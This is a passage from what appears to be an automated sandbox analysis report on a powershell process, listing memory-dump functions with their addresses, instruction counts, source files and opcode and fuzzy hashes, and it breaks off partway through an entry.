                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBB67F Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bc612916a621dd83f346e122f0086241485ac14c82a2d989c11621e8fc53f32
                                  • Instruction ID: fb88f372dd5553f034b7a94111f4ab9db76c1c6150daa678b2c083309075cf58
                                  • Opcode Fuzzy Hash: 2bc612916a621dd83f346e122f0086241485ac14c82a2d989c11621e8fc53f32
                                  • Instruction Fuzzy Hash: 4451B5F2E006098FCB25CF65C8406DDBBB1EF45314F298659E9057B290D7716E46CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB79F1 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6e591dba62f69f36749b07d4d457b9ce491d343db55872cee7f2b1cfed21c5f
                                  • Instruction ID: 7e1863aef8bdbf52451d9d5af29355bfc361e1fdff7caff350d7cbcb7b31ba6c
                                  • Opcode Fuzzy Hash: d6e591dba62f69f36749b07d4d457b9ce491d343db55872cee7f2b1cfed21c5f
                                  • Instruction Fuzzy Hash: 27514474A00245DFDB14DF68C484AAEBBF2EF88315F158469E916AB3A1CB31ED45CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D393A2 Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21ccac97715b96386cf0ba73b985d1af81731c3e4375f26be4ecf7145418dbeb
                                  • Instruction ID: aaa77da900e39c035fbe903aa430763ea51b6677936fc77a95bc42318f1bb0cd
                                  • Opcode Fuzzy Hash: 21ccac97715b96386cf0ba73b985d1af81731c3e4375f26be4ecf7145418dbeb
                                  • Instruction Fuzzy Hash: 295129B0A002469FDB14DF64D494BAEBBF2FF88305F144569E806AB7A1DB74E885CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D393B0 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bf6be3543e765dd306334be53000f1bf13176acdace763ffff7425943c454db
                                  • Instruction ID: b6fa3062f9c79496dd410be0b7c1a2454c3651539d38ddb2ba9fc2cce8f5f34f
                                  • Opcode Fuzzy Hash: 1bf6be3543e765dd306334be53000f1bf13176acdace763ffff7425943c454db
                                  • Instruction Fuzzy Hash: 89513AB0A002069FDB14DF64D494BAEBBB6BF88305F144469E806AB7A1DB74E885CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBD627 Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b792a1fdff33c81945c25d87f2a1e015ba00254e40207fd8dba0cfc07e93f6fa
                                  • Instruction ID: 8021c5afb1a6b0cbd605e6b77a14805c2e0100260e74c1d2c5d18d1a1c65a509
                                  • Opcode Fuzzy Hash: b792a1fdff33c81945c25d87f2a1e015ba00254e40207fd8dba0cfc07e93f6fa
                                  • Instruction Fuzzy Hash: 45517C70A04649DFCB14DF64D890AEEB7B6FF89305F148829E406AB264DB71A941CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C62DF0 Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c20e17b1f3f4d79c2f6b03036c3009f5390c1fd607f53e91ca35b68a5acde504
                                  • Instruction ID: f2556e1e032cff22677bd0f5956a8300072f224252ee347fa7d79644c77c6ff4
                                  • Opcode Fuzzy Hash: c20e17b1f3f4d79c2f6b03036c3009f5390c1fd607f53e91ca35b68a5acde504
                                  • Instruction Fuzzy Hash: 0651CF742007029FC324AB79C89176EB7A2FBC1324F108A2DD1669F7D5CF75E8428B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB4B08 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ab48de265e8ed6cf14b4286315e4e1b2573f2350c169b65a9b93c06cd95f4c8
                                  • Instruction ID: ad3cef2b6a84c66bdad3743524f58b7b5c1f87119ef9e3191b1c4fda4e470952
                                  • Opcode Fuzzy Hash: 9ab48de265e8ed6cf14b4286315e4e1b2573f2350c169b65a9b93c06cd95f4c8
                                  • Instruction Fuzzy Hash: 42515274A002148FCB58DFB9C8846ADBBF2FF88311F148469E916EB351DB75E9018B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C62E00 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a8e3f521ab36e3016bc928248ad15482739b0116c9e6fb39ff94a9793043fb3
                                  • Instruction ID: dfb6c563b0a99490bf5b4f28ab9816b2e7797fe587002a6bf9502b77aa20a130
                                  • Opcode Fuzzy Hash: 4a8e3f521ab36e3016bc928248ad15482739b0116c9e6fb39ff94a9793043fb3
                                  • Instruction Fuzzy Hash: 5B417F742047029FD324AB75C891B2EB796FBC1324F108A2CD1669F7D4DF75E8428B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB9590 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 917b0007cf8f538f0a8c6058e8ba006408cca9cd3041ee8a1b148c605e81f6a9
                                  • Instruction ID: c1c123f9d20ed105e7cd5bcdb7941ffaf612d7d7a62bb70f1f69239929ddb939
                                  • Opcode Fuzzy Hash: 917b0007cf8f538f0a8c6058e8ba006408cca9cd3041ee8a1b148c605e81f6a9
                                  • Instruction Fuzzy Hash: 7541D8B0B042459BDB55DBB9C8847EF7BEAEBC9300F104139A709D7384EF74AA058791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69987 Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 30cb3f9bc8e6e65b96b5cb83947007c3093c2137c1e20a46a5b9ca2600549f4e
                                  • Instruction ID: 509daff0ed783cea5244e498e6ed5aafd986752d90f345304deb8915f0c50c3a
                                  • Opcode Fuzzy Hash: 30cb3f9bc8e6e65b96b5cb83947007c3093c2137c1e20a46a5b9ca2600549f4e
                                  • Instruction Fuzzy Hash: 5B416CB0E042098FCB24DF68D4C8AEDBBF2EF88314F148469D815AB390DB74E945CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBAEBE Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b034f677d257dfbb28146647cb687fc70e0f7d2aec9029272b22c58e06a16a16
                                  • Instruction ID: 772d7806d8e24dbf7a32ba16de4e4d03063b2082e77bec495267f101e40d17db
                                  • Opcode Fuzzy Hash: b034f677d257dfbb28146647cb687fc70e0f7d2aec9029272b22c58e06a16a16
                                  • Instruction Fuzzy Hash: F9513BB0A042099FCB24DF64D895BADBBB6FB84300F108429E54AAB395DF35AD85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C66808 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 474385484532b42cfa23da195fd16d5b8fff6f6c6e059a646f0e8e2bfbef9545
                                  • Instruction ID: 1d2e129f25b87102fbbbbbc90d1a27f7c5741a491530fa8acc4a7d3ee988e17f
                                  • Opcode Fuzzy Hash: 474385484532b42cfa23da195fd16d5b8fff6f6c6e059a646f0e8e2bfbef9545
                                  • Instruction Fuzzy Hash: 26417EB47001019FCB08DF68D494A6E7BAAEF89355F148069E906DB395CF35DD05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3D6F7 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1c0edcae9fe7352814f4efa9fbeff488d9ff9a02908cde32c8b05fa46ec4b75
                                  • Instruction ID: 338a9eb0c0c0624fa8192be31f106206feb2a0163e260ec6aaff0d59c021f94e
                                  • Opcode Fuzzy Hash: d1c0edcae9fe7352814f4efa9fbeff488d9ff9a02908cde32c8b05fa46ec4b75
                                  • Instruction Fuzzy Hash: 90418AB4E0465A9BDB14DFA5C44079EBBF2AF84304F248429E841BB345DB74A94ACBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D396B8 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38ceec49a51121876781e9648e5c2d2561dc20196141f999601fa0cf6d2ffba7
                                  • Instruction ID: c17dad548d6ca92d45af92dd1c09d7c2bafa8ead9303ebacb0b099ca86bcc4b8
                                  • Opcode Fuzzy Hash: 38ceec49a51121876781e9648e5c2d2561dc20196141f999601fa0cf6d2ffba7
                                  • Instruction Fuzzy Hash: 5B418FF6A002158BDF14CF69C5503EEF7F1AF88259F044025D846EB390EB75AE45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3D708 Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 387a46a1ee2aaaf73af4b39f24d1cedb85b1265207a3a7bdc288d4882ffaabf2
                                  • Instruction ID: 11a8237545c0e7e43e1e924517c5c8bb7754101c8be0ee0e00e85062fcf4a44a
                                  • Opcode Fuzzy Hash: 387a46a1ee2aaaf73af4b39f24d1cedb85b1265207a3a7bdc288d4882ffaabf2
                                  • Instruction Fuzzy Hash: A2417CB0E0465A9BDB14DFA5C4407AEFBF2BF84304F158429E945BB344DBB4A949CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB4B07 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fcbe140c9d6dd299a1072675290cf09d12ed78fee4c8ae1ce25ac7b3495c9e80
                                  • Instruction ID: 7c4d8e74845e111b793c33ab93418a217bb3f9fbddcfe7421515b43e8374ab2d
                                  • Opcode Fuzzy Hash: fcbe140c9d6dd299a1072675290cf09d12ed78fee4c8ae1ce25ac7b3495c9e80
                                  • Instruction Fuzzy Hash: 7B415170A042558FCB68CF79C884AADBBF2BF88311F148069E916EB361DB75DA41CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69C68 Relevance: .1, Instructions: 109COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: feef6da107f291a7c6160956d99c51ae00c4c40c89a96f435cc7062d1bbf67d4
                                  • Instruction ID: 0435c0aecc92384b50ca2e0818adc931a87c5951fe8947f090d669cba46d5e27
                                  • Opcode Fuzzy Hash: feef6da107f291a7c6160956d99c51ae00c4c40c89a96f435cc7062d1bbf67d4
                                  • Instruction Fuzzy Hash: 2131B7B07042428BDB64AE25D4CD37E77E6BBC9211F14643ED107D6780CF7AA80ACB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35EB8 Relevance: .1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11dfe8b1b43e49e11fbfa02fbf5f3873f2c6b65b84ebc9a25c6b9dddad2f8b23
                                  • Instruction ID: bd111aeccccbed3341b64f75c0ac8d1d01749d06ca6dbcb7d60c93e20785ddaa
                                  • Opcode Fuzzy Hash: 11dfe8b1b43e49e11fbfa02fbf5f3873f2c6b65b84ebc9a25c6b9dddad2f8b23
                                  • Instruction Fuzzy Hash: A53181B5B011099FDB44DB78D890AAEB7B6FF85314F158069E80ADB351DB30ED01CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB8E80 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 179d88f0682dba30dd3e84a1aa57e76e8e3916918e67cdc8bee30624ce88f579
                                  • Instruction ID: 44818046a70a5f7c452bd9471a4fa2f959df6bfa49b4dd2a92cd0dad7818d526
                                  • Opcode Fuzzy Hash: 179d88f0682dba30dd3e84a1aa57e76e8e3916918e67cdc8bee30624ce88f579
                                  • Instruction Fuzzy Hash: 8B316FB4B046068FCB14DF6AD88199ABBFAFF85310F1481A9E504DB265DB34EE01CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB8E90 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 427094ca8839cb0dd49b2925b2f95d42302869a3fbd8048f519b23ebf9068b80
                                  • Instruction ID: fbc80b03771061eb4045955309b9a95140cbfa733a95f2cbc2dd2aa911c1217b
                                  • Opcode Fuzzy Hash: 427094ca8839cb0dd49b2925b2f95d42302869a3fbd8048f519b23ebf9068b80
                                  • Instruction Fuzzy Hash: 93314AB4A005059FCB14DF59C581AAEBBF6FF88350F148169E508DB365DB34ED41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3D5A0 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc8765eb2ccbb9ebbe81cca2cf900d63e29ec154f3da09b108c441917b020e83
                                  • Instruction ID: 98e61a41dba974b8e1c19e174fc4dae4869705152244519fdf00232538afc14e
                                  • Opcode Fuzzy Hash: bc8765eb2ccbb9ebbe81cca2cf900d63e29ec154f3da09b108c441917b020e83
                                  • Instruction Fuzzy Hash: C1215AB270C3845FDB155BB598146BA7FEADF86111B0840BFE549C7251DE38C904CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35EC8 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c8d595fca8e70ba4e427dbe2ab9f655b04fd410c4a44fb68e6f54ac6a8f521c
                                  • Instruction ID: 660d59539990573d05979d6618755b2595dc46796652257c859c6bd689fd8a74
                                  • Opcode Fuzzy Hash: 7c8d595fca8e70ba4e427dbe2ab9f655b04fd410c4a44fb68e6f54ac6a8f521c
                                  • Instruction Fuzzy Hash: 23315EB5B011099FCB44DB68D890AAEB7B6FF88314F158069E40AEB351DB30ED01CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB53B0 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e8fa5eee2cf757a3ff048ae7ef69407c1c46a0c0ce9884383aea87674253d0c
                                  • Instruction ID: 9679caa99d8ab366bfc3e95dbcffd5382f71b4627821b494651210b78e0b417a
                                  • Opcode Fuzzy Hash: 5e8fa5eee2cf757a3ff048ae7ef69407c1c46a0c0ce9884383aea87674253d0c
                                  • Instruction Fuzzy Hash: 9F31A6B1A002058BDB24DBB5E8946EDB7F1EF88355F148429E402EB750DFB1AD04CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3C2ED Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1af278af3813f96f54bb80098f5e123b68165dd21d46972c4a2c1f9dac14b95e
                                  • Instruction ID: 7157c37dac9b6cd8e7d7c490bd929624753736c2f2236bf5131158fadddbadf1
                                  • Opcode Fuzzy Hash: 1af278af3813f96f54bb80098f5e123b68165dd21d46972c4a2c1f9dac14b95e
                                  • Instruction Fuzzy Hash: E9311775B042088FDB14DFB8C458BADBBB2AF88315F158029D61AA7394DF75AC42CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B0D1 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8918c4a697ecaa31e906b8d52231c5485c35f066d04cae4251933fc5cb885301
                                  • Instruction ID: 67f35095390583f3f0600ab9c6106f8830a16002532949c15a674e1d6bb7b109
                                  • Opcode Fuzzy Hash: 8918c4a697ecaa31e906b8d52231c5485c35f066d04cae4251933fc5cb885301
                                  • Instruction Fuzzy Hash: 1831E3B5A042499FCB01CF64D8419AEFBB2FF89314B044656E605EB352CB31AD46CFE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB5FB4 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49d90ba3ff823bca325efe4a2348fede1bb096b1ead3f97d17106ee4008b3426
                                  • Instruction ID: 9cabc811565983488636d8d2a3e455369bf92502a2fc04b7d53f3c69c98e896f
                                  • Opcode Fuzzy Hash: 49d90ba3ff823bca325efe4a2348fede1bb096b1ead3f97d17106ee4008b3426
                                  • Instruction Fuzzy Hash: 453104B4A04209CFCB24DFA9D484A9DBBB6FF49309F148458E50AAB365DB35EC81CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3E70A Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b98581996eb4ee24d2592e61e391af6c2f28a6f4b5edfd6ca30cdbf220395321
                                  • Instruction ID: 17d8e1c8044eec970cb935ab0e257a79bd479a6fa293468bd504d206aa5f489f
                                  • Opcode Fuzzy Hash: b98581996eb4ee24d2592e61e391af6c2f28a6f4b5edfd6ca30cdbf220395321
                                  • Instruction Fuzzy Hash: 03315AB0A001599FCB04DF94C998BAEBBB1FF44305F004469E502AF3A4CBB4A945CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A727 Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c03d8247b54596a78370c0695fd969721afad2b83af1932e4662e37e8536ab3d
                                  • Instruction ID: 538f7dc80102ab4d842c37165e98b49beb97e1d5cd7c7acd3902742837cdd23d
                                  • Opcode Fuzzy Hash: c03d8247b54596a78370c0695fd969721afad2b83af1932e4662e37e8536ab3d
                                  • Instruction Fuzzy Hash: EB319FB4B002469FD7189B64C4987EEBBF2BF88315F148468E445EB790DB719C86CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D395F0 Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e9e3211e71606c49bb87e1fb19a86f99711250ece976eb88bf449902958f44b
                                  • Instruction ID: 8dc6f5bcc7e1daed2cff12c73763e360fb7bef3cf507b93274f9a42f7dd6e679
                                  • Opcode Fuzzy Hash: 2e9e3211e71606c49bb87e1fb19a86f99711250ece976eb88bf449902958f44b
                                  • Instruction Fuzzy Hash: 9121CF763012605FD700DB69E884D9EBBA6FFC96757158076E605CB362CB72EC08C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35C38 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3355e2ac4d807af8c27467f614895d58b35888010f73951857e3458bde65de45
                                  • Instruction ID: 072c1da32bd18a40b67ed0062ec05fcd54b3ab7594b6a9992524f6a964501c94
                                  • Opcode Fuzzy Hash: 3355e2ac4d807af8c27467f614895d58b35888010f73951857e3458bde65de45
                                  • Instruction Fuzzy Hash: 1A21E571A04209AFDB14CBA4E880AEEFBF6EF89214F14403AE506F7240DB315941CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D362E0 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e5063e1607e9f12b76dc07068bc232de065182bde523fd2723fa925ccc5e5d2
                                  • Instruction ID: a6a64767161d167734cf72d1cb7a95af934da828510c531f3f589669f576c35f
                                  • Opcode Fuzzy Hash: 7e5063e1607e9f12b76dc07068bc232de065182bde523fd2723fa925ccc5e5d2
                                  • Instruction Fuzzy Hash: 8721DBB97053129BDB15566594147BABAEADF81295F0C4029E841C7780EF3CCD45C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBE340 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
